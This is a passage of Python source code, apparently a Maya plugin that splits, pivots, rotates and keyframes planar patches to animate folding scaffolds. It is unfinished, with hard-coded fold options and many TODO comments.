Modifcation\r\n - isLeft\r\n - rotationalAxis\r\n\r\n '''\r\n self.basicScaffold: fold.HBasicScaff = None\r\n\r\n # TODO: for now, use FoldManager instead of basicScaffold to output hard coded results\r\n # self.foldManager: fold.FoldManager = None\r\n # self.foldManagerOption: fold.FoldOption = None\r\n\r\n def getBasePatch(self) -> str:\r\n return self.basePatch\r\n\r\n # TODO: Test moving it to inputScaffold\r\n def getPatches(self) -> List[str]:\r\n return self.patches\r\n\r\n def getPatchesIncludeBase(self) -> List[str]:\r\n patches = [self.basePatch]\r\n patches.extend(self.patches)\r\n return patches\r\n\r\n # TODO: why is this a list list list?\r\n def getAllPatchVertices(self) -> List[List[List[float]]]:\r\n # For each element in self.getPatchesIncludeBase, call getObjectVerticeNamesAndPositions\r\n shapeVertices = []\r\n for patch in self.getPatchesIncludeBase():\r\n vertices = getObjectVerticeNamesAndPositions(patch)\r\n shapeVertices.append(list(vertices.values()))\r\n\r\n return shapeVertices\r\n\r\n def cleanUpSplitPatches(self):\r\n print(\"cleaning up split patches...\")\r\n for i in range(0, len(self.newShapes)):\r\n cmds.delete(self.newShapes[i])\r\n\r\n # Clear the new shapes list.\r\n self.newShapes = []\r\n\r\n def setUpGenericScene(self, upperPatches: List[str], basePatch: str):\r\n print(\"Setting up Generic scene...\")\r\n # TODO: theoretically we should only need to move things in the upper patches\r\n # Get the transforms for each item in upper patches\r\n transforms = []\r\n for patch in upperPatches:\r\n transforms.append(getObjectTransformFromDag(patch))\r\n\r\n original_transforms = self.shapeResetTransforms\r\n\r\n # Set the translation for each of the patches to the original translations\r\n for i in range(0, len(upperPatches)):\r\n patch_name = upperPatches[i]\r\n original_translate = original_transforms[patch_name][0]\r\n translate_vec = OpenMaya.MVector(original_translate[0], original_translate[1], original_translate[2])\r\n transforms[i].setTranslation(translate_vec, OpenMaya.MSpace.kWorld)\r\n\r\n # Set the rotation for each of the patches to the original rotations\r\n for i in range(0, len(transforms)):\r\n patch_name = upperPatches[i]\r\n original_rotate = original_transforms[patch_name][1]\r\n cmds.setAttr(patch_name + \".rotate\", original_rotate[0][0], original_rotate[0][1], original_rotate[0][2])\r\n\r\n def restoreInitialState(self):\r\n # Sets the shapeTraverseOrder to the original scaff's patches\r\n # Sets\r\n print(\"Restoring Initial State...\")\r\n self.shapeTraverseOrder = self.getPatches()\r\n\r\n # Clears self.shapeResetTransforms\r\n self.shapeResetTransforms = {}\r\n\r\n # fill new_translation and new_rotation with original values\r\n for shape in self.shapeTraverseOrder:\r\n transform = getObjectTransformFromDag(shape)\r\n translate = transform.translation(OpenMaya.MSpace.kWorld)\r\n rotate = cmds.getAttr(shape + \".rotate\")\r\n\r\n # Reset self.shapeResetTransforms\r\n self.shapeResetTransforms[shape] = [translate, rotate]\r\n\r\n # Reset back to original shapes so you can break them again\r\n self.cleanUpSplitPatches()\r\n\r\n def shrinkPatch(self, shapeTraverseOrder, endPiece, numPieces, startPiece):\r\n print(\"shrinking patches...\")\r\n for i in range(0, len(shapeTraverseOrder) - 1):\r\n foldable_patch = shapeTraverseOrder[i]\r\n middle = 1 / 2 # hard coded for now\r\n\r\n # Translate patch to the new midpoint\r\n pieceWidth = 1.0 / numPieces # hard coded for now\r\n newMiddle = (startPiece + endPiece) * pieceWidth / 2\r\n\r\n print(\"newMiddle in Z direction: {}\".format(newMiddle))\r\n transform = getObjectTransformFromDag(foldable_patch)\r\n translation = OpenMaya.MVector(0, 0, newMiddle) - OpenMaya.MVector(0, 0, middle)\r\n print(\"translation: {}\".format(translation))\r\n transform.translateBy(translation, OpenMaya.MSpace.kTransform)\r\n\r\n # Shrink patch by numPieces in the hard coded z direction\r\n transform = getObjectTransformFromDag(foldable_patch)\r\n shrinkFactor = (endPiece - startPiece) / numPieces\r\n cmds.setAttr(foldable_patch + \".scaleZ\", shrinkFactor)\r\n\r\n def generateNewPatches(self, originalPatch: str, numHinges: int) -> (List[str], List[List[List[float]]]):\r\n # Compute the new patch scale values based on original_patch's scale and num_patches\r\n # TODO: Hard coded for split in the x Direction, but need to be more general later on.\r\n numPatches = numHinges + 1\r\n originalScaleX = cmds.getAttr(originalPatch + \".scaleX\")\r\n originalScaleZ = cmds.getAttr(originalPatch + \".scaleZ\")\r\n\r\n newPatchScale = originalScaleX / numPatches\r\n\r\n # Generate new patches.\r\n newPatches = []\r\n for i in range(0, numPatches):\r\n # TODO: Based on the axis we shrink, either width or height will be the original patch's scale\r\n # This command generates a new polyplane in the scene\r\n newPatch = cmds.polyPlane(name=originalPatch + \"_\" + str(i), width=newPatchScale, height=originalScaleZ,\r\n subdivisionsX=1,\r\n subdivisionsY=1)\r\n newPatches.append(newPatch[0])\r\n\r\n # Rotate the new patches with the same rotation as the original_patch\r\n originalRotation = cmds.getAttr(originalPatch + \".rotate\")\r\n for i in range(0, len(newPatches)):\r\n cmds.setAttr(newPatches[i] + \".rotate\", originalRotation[0][0], originalRotation[0][1],\r\n originalRotation[0][2])\r\n\r\n # Translate the patches along the direction it has been scaled in (but that is local)\r\n # TODO: Axis of scaling is hard coded\r\n originalTranslation = cmds.getAttr(originalPatch + \".translate\")\r\n\r\n # Get the world location of the bottom of the original patch\r\n # TODO: hard coded for the Y direction\r\n originalPatchBottom = originalTranslation[0][1] - originalScaleX * 0.5\r\n newPatchPositions = []\r\n newTransforms = []\r\n for i in range(0, len(newPatches)):\r\n newTranslate = [originalTranslation[0][0], originalPatchBottom + newPatchScale * (i + 0.5),\r\n originalTranslation[0][2]]\r\n newPatchPositions.append(newTranslate)\r\n cmds.setAttr(newPatches[i] + \".translate\", newTranslate[0], newTranslate[1], newTranslate[2])\r\n\r\n # Append new patch transform to list of new transforms\r\n # Which will be used for its scene reset at the beginning\r\n # TODO: why is this a tuple with the name in the first spot?\r\n newTransforms.append([newTranslate, originalRotation])\r\n\r\n # Pivot the patches.\r\n for i in range(0, len(newPatches)):\r\n # Set the pivot location to the bottom of the patch\r\n newPivot = [newPatchScale * 0.5, 0, 0]\r\n transform = getObjectTransformFromDag(newPatches[i])\r\n transform.setRotatePivot(OpenMaya.MPoint(newPivot[0], newPivot[1], newPivot[2]), OpenMaya.MSpace.kTransform,\r\n True)\r\n\r\n newPatches.reverse()\r\n newTransforms.reverse()\r\n\r\n return newPatches, newTransforms\r\n\r\n def breakPatches(self, shapeTraverseOrder: List[str], numHinges: int):\r\n\r\n # Render the original foldable patch invisible\r\n # Take every guy except the last guy and hide it\r\n # TODO: now, i know that since this is a basic patch, there should only ever be one of these guys.\r\n foldablePatches = self.patches[:-1]\r\n for patch in foldablePatches:\r\n cmds.setAttr(patch + \".visibility\", False)\r\n\r\n print(\"break patches called\")\r\n for j in range(0, len(shapeTraverseOrder) - 1): # every patch except last guy is foldable\r\n foldablePatch = shapeTraverseOrder[\r\n j] # TODO: make more generic, currently assumes foldable patch is at the center\r\n\r\n shapeTraverseOrder.remove(foldablePatch)\r\n del self.shapeResetTransforms[foldablePatch]\r\n\r\n newPatches, newTransforms = self.generateNewPatches(foldablePatch, numHinges)\r\n\r\n # Add the new patch transforms to the shape_reset_transforms and insert new patches to shape_traverse_order\r\n for i in range(0, len(newPatches)):\r\n shapeTraverseOrder.insert(j, newPatches[i])\r\n self.shapeResetTransforms[newPatches[i]] = [newTransforms[i][0], newTransforms[i][1]]\r\n\r\n # Keep track of the new patches just created so we can delete it on the next iteration\r\n self.newShapes.append(newPatches[i])\r\n\r\n def getPatchPivots(self, shapeTraverseOrder: List[str]) -> List[OpenMaya.MPoint]:\r\n patchPivots = []\r\n for shape in shapeTraverseOrder:\r\n pivot = getObjectTransformFromDag(shape).rotatePivot(OpenMaya.MSpace.kWorld)\r\n patchPivots.append(pivot)\r\n print(\"Pivot: {:.6f}, {:.6f}, {:.6f}\".format(pivot[0], pivot[1], pivot[2]))\r\n return patchPivots\r\n\r\n def findClosestMidpointsOnPatches(self, patchPivots: List[OpenMaya.MPoint], shapeTraverseOrder: List[str]) -> (\r\n List[List], List[float]):\r\n closestVertices = []\r\n midPoints = []\r\n for i in range(0, len(shapeTraverseOrder) - 1):\r\n # For each parent patch, get their vertices.\r\n shape = shapeTraverseOrder[i]\r\n child = shapeTraverseOrder[i + 1]\r\n\r\n bottomVertices = getObjectVerticeNamesAndPositions(shape)\r\n\r\n childPivot = patchPivots[i + 1]\r\n\r\n # find two vertices that are closest to childPivot. Print their name, location, and distance.\r\n vertId = len(closestVertices)\r\n currentClosest = getClosestVertices(bottomVertices, childPivot, 2)\r\n closestVertices.append(currentClosest)\r\n print(\"Closest Vertices: {}, dist: {:.6f}, {:.6f}, {:.6f}, {:.6f}\".format(closestVertices[vertId][0][0],\r\n closestVertices[vertId][0][1],\r\n closestVertices[vertId][0][2][0],\r\n closestVertices[vertId][0][2][1],\r\n closestVertices[vertId][0][2][2]))\r\n print(\"Closest Vertices: {}, dist: {:.6f}, {:.6f}, {:.6f}, {:.6f}\".format(closestVertices[vertId][1][0],\r\n closestVertices[vertId][1][1],\r\n closestVertices[vertId][1][2][0],\r\n closestVertices[vertId][1][2][1],\r\n closestVertices[vertId][1][2][2]))\r\n\r\n # Get the middle point between the two vertices.\r\n verticeDist = closestVertices[vertId][0][2] + closestVertices[vertId][1][2]\r\n print(\"Vertice Dist: {:.6f}, {:.6f}, {:.6f}\".format(verticeDist[0], verticeDist[1], verticeDist[2]))\r\n middlePoint = (verticeDist * 0.5)\r\n print(\"Middle Point: {:.6f}, {:.6f}, {:.6f}\".format(middlePoint[0], middlePoint[1], middlePoint[2]))\r\n\r\n midPoints.append(middlePoint)\r\n\r\n # Ensure the parent and child are actually connected\r\n # TODO: generalize to T scaffolds as well\r\n if (i == len(shapeTraverseOrder) - 2):\r\n # TODO: generalize to the one without the error\r\n print(\"Checking connectivity Top Base findClosestMidpointsOnPatches 501...\")\r\n print(\"TOP BASE PATCH: \", child)\r\n print(\"CURRENT PATCH: \", shape)\r\n checkScaffoldConnectionTopBase(currentClosest, child)\r\n else:\r\n print(\"Checking regular connectivity findClosestMidpointsOnPatches 504...\")\r\n checkScaffoldConnection(childPivot, middlePoint)\r\n\r\n return closestVertices, midPoints\r\n\r\n # TODO: might be a member function of basic scaff\r\n def rotatePatches(self, angle: float, rotAxis: List[float], shapeTraverseOrder: List[str], isLeft: bool) -> List[\r\n OpenMaya.MFnTransform]:\r\n patchTransforms = []\r\n if (isLeft):\r\n angle = -angle\r\n\r\n for i in range(0, len(shapeTraverseOrder)):\r\n shape = shapeTraverseOrder[i]\r\n pTransform = getObjectTransformFromDag(shape)\r\n patchTransforms.append(pTransform)\r\n if (i == len(shapeTraverseOrder) - 1): # TODO: fix this bc it won't work for T scaffolds\r\n break\r\n\r\n q = OpenMaya.MQuaternion(math.radians(angle), OpenMaya.MVector(rotAxis[0], rotAxis[1], rotAxis[2]))\r\n pTransform.rotateBy(q, OpenMaya.MSpace.kTransform)\r\n\r\n angle = -angle\r\n return patchTransforms\r\n\r\n def updatePatchTranslations(self, closestVertices: List, midPoints: List, patchPivots: List, patchTransforms: List,\r\n shapeTraverseOrder: List[str]):\r\n # Get the new closest vertices without changing the original closest vertices\r\n newClosestVertices = closestVertices.copy()\r\n for i in range(0, len(patchPivots) - 1):\r\n # Obtain child pivot so we can use it later for translation\r\n childPivot = patchPivots[i + 1]\r\n for j in range(0, len(newClosestVertices[\r\n i])): # index and use information from updated vertex positions. There should only be 2 verts here\r\n vertex_name, dist, vertexPoint = newClosestVertices[i][j]\r\n\r\n # Get the world position of the vertex and convert it to an MVector\r\n vertexPoint = cmds.pointPosition(vertex_name, world=True)\r\n vertexPoint = OpenMaya.MVector(vertexPoint[0], vertexPoint[1], vertexPoint[2])\r\n\r\n newClosestVertices[i][j] = (\r\n vertex_name, 0, # not sure if dist is important anymore\r\n vertexPoint)\r\n\r\n # Print new location and distance.\r\n print(\"Closest Vertices: {}, dist: {:.6f}, {:.6f}, {:.6f}, {:.6f}\".format(newClosestVertices[i][j][0],\r\n newClosestVertices[i][j][1],\r\n newClosestVertices[i][j][2][\r\n 0],\r\n newClosestVertices[i][j][2][\r\n 1],\r\n newClosestVertices[i][j][2][\r\n 2]))\r\n\r\n # Midpoint formula to solve for the midpoint betwen the two closest vertices.\r\n verticeDistNew = newClosestVertices[i][0][2] + newClosestVertices[i][1][2]\r\n middlePointNew = (verticeDistNew * 0.5)\r\n print(\r\n \"Middle Point: {:.6f}, {:.6f}, {:.6f}\".format(middlePointNew[0], middlePointNew[1], middlePointNew[2]))\r\n\r\n # Get the translation from the old middle point to the new middle point.\r\n ogMidPoint = midPoints[i]\r\n translation = middlePointNew - ogMidPoint\r\n print(\"Middle point translation: {:.6f}, {:.6f}, {:.6f}\".format(translation[0], translation[1],\r\n translation[2]))\r\n\r\n # Translate child patch by the translation.\r\n print(\"Translating child patch: \" + shapeTraverseOrder[i + 1])\r\n childPatchTransform = patchTransforms[i + 1]\r\n print(\"Translation: {:.6f}, {:.6f}, {:.6f}\".format(translation[0], translation[1], translation[2]))\r\n childPatchTransform.translateBy(translation, OpenMaya.MSpace.kWorld)\r\n\r\n def genBestFoldOption(self):\r\n # Return the hard coded object from foldManager for now\r\n print(\"Generate Best fold Option... TODO: implement me!\")\r\n # patchVertices = self.getAllPatchVertices()\r\n # patchVertices = np.array(patchVertices)\r\n #\r\n # # TODO: get its own best fold option\r\n # self.foldManager = fold.FoldManager()\r\n # self.foldManager.generate_h_basic_scaff(patchVertices[0], patchVertices[1], patchVertices[2])\r\n #\r\n # self.foldManagerOption = self.foldManager.mainFold(self.maxHinges, self.shrinks)\r\n\r\n # Splits the foldTest function into two parts.\r\n def foldKeyframe(self, time, shapeTraverseOrder: List[str], foldSolution: fold.FoldOption, recreatePatches: bool, startTime: int, endTime: int):\r\n # Get the relevant information from the fold_solution\r\n startAngles = foldSolution.fold_transform.startAngles\r\n endAngles = foldSolution.fold_transform.endAngles\r\n\r\n isLeft = foldSolution.isleft\r\n\r\n # Hinge variables\r\n numHinges = foldSolution.modification.num_hinges\r\n\r\n # Shrinking variables\r\n startPiece = foldSolution.modification.range_start\r\n endPiece = foldSolution.modification.range_end # non inclusive\r\n numPieces = foldSolution.modification.num_pieces\r\n\r\n t = time # dictate that the end time is 90 frames hard coded for now\r\n\r\n print(\"local time: \" + str(t))\r\n\r\n # TODO: make more generic in the future\r\n rotAxis = (0, 0, 1)\r\n\r\n # Update the list of shape_traverse_order to include the new patches where the old patch was\r\n if (recreatePatches and numHinges > 0):\r\n print(\"about to break patches... number of hinges... \" + str(numHinges))\r\n self.breakPatches(shapeTraverseOrder, numHinges)\r\n\r\n # TODO: let author dictate end time.. but this doesn't realy matter.\r\n # TODO: THIS FORMULA DOES NOT WORK\r\n # angle = t * (endAngles[0] - startAngles[0]) / (endTime - startTime) # The angle we fold at this particular time is time / 90 *\r\n\r\n # Moved from the recreate_patches condition because we always want this to be visible if no hinges\r\n # TODO: ventually move this to a better place\r\n if (numHinges == 0):\r\n # set middle patch to be visible\r\n cmds.setAttr(shapeTraverseOrder[0] + \".visibility\", 1)\r\n\r\n # Loop through the patches and get all of their pivots.\r\n patchPivots = self.getPatchPivots(shapeTraverseOrder)\r\n\r\n # Find the closest vertices to the patch pivots and calculate the midPoints, also check scaff is connected\r\n closestVertices, midPoints = self.findClosestMidpointsOnPatches(patchPivots, shapeTraverseOrder)\r\n\r\n # Rotation logic\r\n print(\"startTime: \" + str(startTime))\r\n print(\"endTime: \" + str(endTime))\r\n print(\"time: \" + str(t))\r\n if (endTime > t >= startTime):\r\n targetPatchHeight = (endTime - t) / (endTime - startTime) * self.origFoldPatchHeight\r\n print(\"targetPatchHeight: \" + str(targetPatchHeight))\r\n\r\n rightTriangleHeight = targetPatchHeight / (numHinges + 1)\r\n rightTriangleHypotenuse = self.origFoldPatchHeight / (numHinges + 1)\r\n\r\n asin = math.asin(rightTriangleHeight / rightTriangleHypotenuse)\r\n print(\"arcsin: \" + str(asin) + \" radians\")\r\n angle = endAngles[0] - math.degrees(asin)\r\n\r\n print(\"angle: \" + str(angle))\r\n elif (t < startTime):\r\n # do not rotate\r\n # TODO: see if there's a better way to do this\r\n angle = startAngles[0]\r\n else:\r\n # if t >= endTime\r\n angle = endAngles[0]\r\n\r\n # Perform rotations at once, but do not rotate the last patch\r\n patchTransforms = self.rotatePatches(angle, rotAxis, shapeTraverseOrder, isLeft)\r\n\r\n # Update location of closest vertices after rotation and update children translations\r\n self.updatePatchTranslations(closestVertices, midPoints, patchPivots, patchTransforms, shapeTraverseOrder)\r\n\r\n # Has to go at the end or something otherwise you'll get a space between top patch and the folds\r\n self.shrinkPatch(shapeTraverseOrder, endPiece, numPieces, startPiece)\r\n\r\n # Fold test for non hard coded transforms: Part 1 of the logic from foldTest, calls foldKeyframe()\r\n # AT this point should already have the best fold option\r\n def foldGeneric(self, time: int, recreatePatches: bool):\r\n # foldOption = self.basicScaffold.fold_options[0]\r\n foldOption = self.foldManagerOption\r\n startTime = foldOption.fold_transform.startTime\r\n endTime = foldOption.fold_transform.endTime\r\n\r\n # If folding for this scaff hasn't started yet, don't do anything\r\n # if (time >= startTime):\r\n # if (time >= endTime):\r\n # Cap animation at endTime\r\n # TODO: might make it so that it doesn't even translate after endTime but not sure.\r\n # time = endTime - 1\r\n\r\n self.inInitialPatches = self.getPatchesIncludeBase()\r\n\r\n if (len(self.shapeTraverseOrder) == 0 or recreatePatches):\r\n self.restoreInitialState()\r\n\r\n else:\r\n # Reset the scene\r\n # TODO; Might not work anymore in a bit\r\n self.setUpGenericScene(self.shapeTraverseOrder, self.shapeBase)\r\n\r\n # Call the keyframe funtion but with the LOCAL TIME rather than the current global time\r\n # localTime = time - startTime\r\n # TODO: get rid of these params since some of them are just member vars\r\n self.foldKeyframe(time, self.shapeTraverseOrder, foldOption, recreatePatches, startTime, endTime)\r\n\r\n\r\nclass MayaInputScaffoldWrapper():\r\n def __init__(self, patches: List[str], pushAxis: OpenMaya.MVector, nH: int, nS: int):\r\n self.pushAxis = pushAxis\r\n self.patches = patches\r\n self.bases = []\r\n self.foldables = []\r\n self.edges = []\r\n self.maxHinges = nH\r\n self.shrinks = nS\r\n\r\n self.inputScaffold = None\r\n self.basicScaffolds: List[MayaHBasicScaffoldWrapper] = []\r\n\r\n def getPatches(self) -> List[str]:\r\n return self.patches\r\n\r\n def genConnectivityInfo(self):\r\n # Test each patch for connectivity to other patches\r\n # First, only get the patches that are normal to the pushing direction called base patch\r\n # For each base patch, test for connectivity against all other patches (foldable patches)\r\n # If they are close enough to each other via check-scaffold connectivity, then add an edge between them in the form of\r\n # [base_patch, foldable_patch]\r\n\r\n for patch in self.patches:\r\n # Get the surface normal of the patch in world space\r\n # print(\"getting surface normal for {}\".format(patch))\r\n planeDagPath = getObjectObjectFromDag(patch)\r\n fnMesh = OpenMaya.MFnMesh(planeDagPath)\r\n\r\n # Get the normal of the plane's first face (face index 0)\r\n # Note: If the plane has multiple faces, specify the desired face index\r\n normal = OpenMaya.MVector()\r\n # Apparently the normal agument is the SECOND argument in this dumbass function\r\n fnMesh.getPolygonNormal(0, normal, OpenMaya.MSpace.kWorld)\r\n\r\n # print(\"normal: {:.6f}, {:.6f}, {:.6f}\".format(normal[0],\r\n # normal[1],\r\n # normal[2]))\r\n\r\n # Get the dot product of normal and pushDir\r\n dot = self.pushAxis * normal\r\n if (abs(abs(dot) - 1) < 0.0001):\r\n # Parallel\r\n self.bases.append(patch)\r\n else:\r\n self.foldables.append(patch)\r\n\r\n edges = []\r\n\r\n # For every base in basePatches, test for connectivity with every foldable_patch\r\n for base in self.bases:\r\n for foldpatch in self.foldables:\r\n # Since this is at the very beginning, checkScaffoldConnection should work as is\r\n # Find pivot of base\r\n pivot = getObjectTransformFromDag(base).rotatePivot(OpenMaya.MSpace.kWorld)\r\n\r\n # find the closest vertices from fold to pivot\r\n vertices = getObjectVerticeNamesAndPositions(foldpatch)\r\n closestVertices = getClosestVertices(vertices, pivot, 2)\r\n\r\n # Check if the middle point is close enough to the pivot\r\n middlePoint = (closestVertices[0][2] + closestVertices[1][2]) / 2\r\n\r\n # TODO: might get scaffolds where they're not connected like this...\r\n print(\"Checking connectivity genConnectivityInfo 742\")\r\n status = checkScaffoldConnectionBaseNoErr(base, closestVertices)\r\n # status = checkScaffoldConnectionNoErr(pivot, middlePoint)\r\n if status:\r\n edges.append([base, foldpatch])\r\n\r\n print(\"Edges:\")\r\n print(edges)\r\n\r\n self.edges = edges\r\n\r\n def cleanUpSplitPatches(self):\r\n print(\"InputScaff: cleaning up split patches...\")\r\n for bScaff in self.basicScaffolds:\r\n bScaff.cleanUpSplitPatches()\r\n\r\n def genInputScaffold(self):\r\n # TODO: not super important yet\r\n print(\"genInputScaffold: Implement me!\")\r\n\r\n def genBasicScaffolds(self):\r\n print(\"Generating Basic Scaffolds...\")\r\n\r\n # Create a dictionary where the key is the foldablePatch and the values are the patches it is connected to\r\n if (len(self.edges) == 0):\r\n print(\"Error! No edges, yet genBasicScaffolds is called!\")\r\n exit(1)\r\n\r\n foldPatchDiction = {}\r\n for edge in self.edges:\r\n if edge[1] not in foldPatchDiction:\r\n foldPatchDiction[edge[1]] = [edge[0]]\r\n else:\r\n foldPatchDiction[edge[1]].append(edge[0])\r\n\r\n # For each entry in foldPatchDiction, create a basic scaffold\r\n for foldPatch in foldPatchDiction:\r\n print(\"BASIC SCAFFOLD CREATION...\")\r\n # Create a basic scaffold with the foldPatch and the base patches it is connected to\r\n\r\n # If the pushAxis is positive, then the basePatch with the lower value in that axis is basePatch\r\n # If the pushAxis is negative, then the basePatch with the higher value in that axis is basePatch\r\n basePatch0 = foldPatchDiction[foldPatch][0]\r\n basePatch1 = foldPatchDiction[foldPatch][1]\r\n\r\n # should be a list of 3 items\r\n basePatch0Vertices = list(getObjectVerticeNamesAndPositions(basePatch0).values())\r\n basePatch1Vertices = list(getObjectVerticeNamesAndPositions(basePatch1).values())\r\n\r\n print(\"basePatch0Vertices: {}\".format(basePatch0Vertices))\r\n print(\"basePatch1Vertices: {}\".format(basePatch1Vertices))\r\n\r\n # TODO: hard coded to be Y axis for now so y axis cannot be 0\r\n basePatch = None\r\n topPatch = None\r\n if self.pushAxis[1] > 0:\r\n if basePatch0Vertices[0][1] < basePatch1Vertices[0][1]:\r\n topPatch = basePatch0\r\n basePatch = basePatch1\r\n else:\r\n topPatch = basePatch1\r\n basePatch = basePatch0\r\n else:\r\n if basePatch0Vertices[0][1] > basePatch1Vertices[0][1]:\r\n topPatch = basePatch0\r\n basePatch = basePatch1\r\n else:\r\n topPatch = basePatch1\r\n basePatch = basePatch0\r\n\r\n print(\"Generate basic scaffold...\")\r\n print(\"my Base Patch: {}\".format(basePatch))\r\n print(\"my Fold Patch: {}\".format(foldPatch))\r\n print(\"my Top Patch: {}\".format(topPatch))\r\n\r\n patchList = [foldPatch, topPatch]\r\n basicScaff = MayaHBasicScaffoldWrapper(basePatch, patchList, self.pushAxis, self.maxHinges, self.shrinks)\r\n self.basicScaffolds.append(basicScaff)\r\n\r\n def genFoldSolutions(self):\r\n # TODO: not super important yet\r\n # Call genFoldSolution of the input scaffold, which will hopefully populate each basic scaffold with a solution and the time interval of the solution\r\n print(\"TODO: genFoldSolutions... implement me!\")\r\n # raise Exception(\"ERROR: GenFoldSolutions not implemented\")\r\n\r\n # TODO: comment this back eventually\r\n # for bScaff in self.basicScaffolds:\r\n # bScaff.genBestFoldOption()\r\n\r\n # TODO: manually set fold option rather than generate them for now\r\n\r\n # FOLD OPTION 1\r\n # fm1 = fold.FoldManager()\r\n #\r\n # alpha = 0.5\r\n # cost1 = 3 # dummy card coded value\r\n # mod1 = fold.Modification(0, 0, 1, 1, cost1)\r\n # patchList1 = np.array(self.basicScaffolds[0].getAllPatchVertices())\r\n #\r\n # fm1.generate_h_basic_scaff(patchList1[0], patchList1[1], patchList1[2])\r\n # patchObjList = [fm1.h_basic_scaff.b_patch, fm1.h_basic_scaff.f_patch, fm1.h_basic_scaff.b_patch_high]\r\n # fo1 = fold.FoldOption(True, mod1, patchObjList)\r\n # fo1.gen_fold_transform()\r\n # fo1.fold_transform.startTime = 0\r\n # fo1.fold_transform.endTime = 90\r\n #\r\n # self.basicScaffolds[0].foldManagerOption = fo1\r\n #\r\n # # FOLD OPTION 2\r\n # fm2 = fold.FoldManager()\r\n #\r\n # mod2 = fold.Modification(0, 0, 1, 2, cost1)\r\n # patchList2 = np.array(self.basicScaffolds[1].getAllPatchVertices())\r\n #\r\n # fm2.generate_h_basic_scaff(patchList2[0], patchList2[1], patchList2[2])\r\n # patchObjList2 = [fm2.h_basic_scaff.b_patch, fm2.h_basic_scaff.f_patch, fm2.h_basic_scaff.b_patch_high]\r\n # fo2 = fold.FoldOption(True, mod2, patchObjList2)\r\n # fo2.gen_fold_transform()\r\n # fo2.fold_transform.startTime = 0\r\n # fo2.fold_transform.endTime = 90\r\n #\r\n # self.basicScaffolds[1].foldManagerOption = fo2\r\n\r\n # FOLD OPTION 3\r\n\r\n # TODO: note that I've flipped the order they go in\r\n # FOLD OPTION 3\r\n fm1 = fold.FoldManager()\r\n cost1 = 3 # dummy card coded value\r\n mod1 = fold.Modification(1, 0, 1, 1, cost1)\r\n patchList1 = np.array(self.basicScaffolds[2].getAllPatchVertices())\r\n\r\n fm1.generate_h_basic_scaff(patchList1[0], patchList1[1], patchList1[2])\r\n patchObjList = [fm1.h_basic_scaff.b_patch, fm1.h_basic_scaff.f_patch, fm1.h_basic_scaff.b_patch_high]\r\n fo1 = fold.FoldOption(True, mod1, patchObjList)\r\n fo1.gen_fold_transform()\r\n fo1.fold_transform.startTime = 0\r\n fo1.fold_transform.endTime = 90\r\n\r\n self.basicScaffolds[2].foldManagerOption = fo1\r\n\r\n # FOLD OPTION 2\r\n fm2 = fold.FoldManager()\r\n mod2 = fold.Modification(3, 0, 1, 1, cost1)\r\n patchList2 = np.array(self.basicScaffolds[1].getAllPatchVertices())\r\n\r\n fm2.generate_h_basic_scaff(patchList2[0], patchList2[1], patchList2[2])\r\n patchObjList2 = [fm2.h_basic_scaff.b_patch, fm2.h_basic_scaff.f_patch, fm2.h_basic_scaff.b_patch_high]\r\n fo2 = fold.FoldOption(True, mod2, patchObjList2)\r\n fo2.gen_fold_transform()\r\n fo2.fold_transform.startTime = 0\r\n fo2.fold_transform.endTime = 180\r\n\r\n self.basicScaffolds[1].foldManagerOption = fo2\r\n\r\n # FOLD OPTION 1\r\n fm3 = fold.FoldManager()\r\n cost1 = 2\r\n mod3 = fold.Modification(1, 0, 1, 1, cost1)\r\n patchList3 = np.array(self.basicScaffolds[0].getAllPatchVertices())\r\n\r\n fm3.generate_h_basic_scaff(patchList3[0], patchList3[1], patchList3[2])\r\n patchObjList3 = [fm3.h_basic_scaff.b_patch, fm3.h_basic_scaff.f_patch, fm3.h_basic_scaff.b_patch_high]\r\n fo3 = fold.FoldOption(True, mod3, patchObjList3)\r\n fo3.gen_fold_transform()\r\n fo3.fold_transform.startTime = 90\r\n fo3.fold_transform.endTime = 180\r\n\r\n self.basicScaffolds[0].foldManagerOption = fo3\r\n\r\n # fm1 = fold.FoldManager()\r\n # cost1 = 3 # dummy card coded value\r\n # mod1 = fold.Modification(1, 0, 1, 1, cost1)\r\n # patchList1 = np.array(self.basicScaffolds[0].getAllPatchVertices())\r\n #\r\n # fm1.generate_h_basic_scaff(patchList1[0], patchList1[1], patchList1[2])\r\n # patchObjList = [fm1.h_basic_scaff.b_patch, fm1.h_basic_scaff.f_patch, fm1.h_basic_scaff.b_patch_high]\r\n # fo1 = fold.FoldOption(True, mod1, patchObjList)\r\n # fo1.gen_fold_transform()\r\n # fo1.fold_transform.startTime = 0\r\n # fo1.fold_transform.endTime = 90\r\n #\r\n # self.basicScaffolds[0].foldManagerOption = fo1\r\n #\r\n # # FOLD OPTION 2\r\n # fm2 = fold.FoldManager()\r\n # mod2 = fold.Modification(3, 0, 1, 1, cost1)\r\n # patchList2 = np.array(self.basicScaffolds[1].getAllPatchVertices())\r\n #\r\n # fm2.generate_h_basic_scaff(patchList2[0], patchList2[1], patchList2[2])\r\n # patchObjList2 = [fm2.h_basic_scaff.b_patch, fm2.h_basic_scaff.f_patch, fm2.h_basic_scaff.b_patch_high]\r\n # fo2 = fold.FoldOption(True, mod2, patchObjList2)\r\n # fo2.gen_fold_transform()\r\n # fo2.fold_transform.startTime = 0\r\n # fo2.fold_transform.endTime = 90\r\n #\r\n # self.basicScaffolds[1].foldManagerOption = fo2\r\n\r\n def fold(self, time, recreatePatches):\r\n # Given that we have each basic scaffold with a solution, take in the current time and see the fold status of each basic scaffold.\r\n # For each basic scaffold, if the solution's startTime is less than the current time, then fold it with some animations\r\n # TODO: need to later figure out how to do this with mid level scaffolds first\r\n # TODO: assume list of basic scaffolds is not sorted in any way\r\n print(\"folding...\")\r\n for bScaff in self.basicScaffolds:\r\n bScaff.foldGeneric(time, recreatePatches)\r\n\r\n\r\n# Node definition\r\nclass foldableNode(OpenMayaMPx.MPxNode):\r\n # Declare class variables:\r\n # TODO:: declare the input and output class variables\r\n # i.e. inNumPoints = OpenMaya.MObject()\r\n\r\n # duration of movement\r\n inTime = OpenMaya.MObject()\r\n\r\n # number of hinges\r\n inNumHinges = OpenMaya.MObject()\r\n\r\n # maximum number of shrinks\r\n inNumShrinks = OpenMaya.MObject()\r\n\r\n # inStringList = OpenMaya.MObject() # TODO make into inInitialpatches\r\n\r\n # Dummy output plug that can be connected to the input of an instancer node\r\n # so our node can \"live\" somewhere.\r\n outPoint = OpenMaya.MObject()\r\n\r\n # basicScaffolds: List[MayaHBasicScaffold] = []\r\n\r\n # TODO: later on we will iterate through basicScaffolds instead\r\n # defaultScaff: MayaHBasicScaffold = None\r\n defaultInputScaffWrapper: 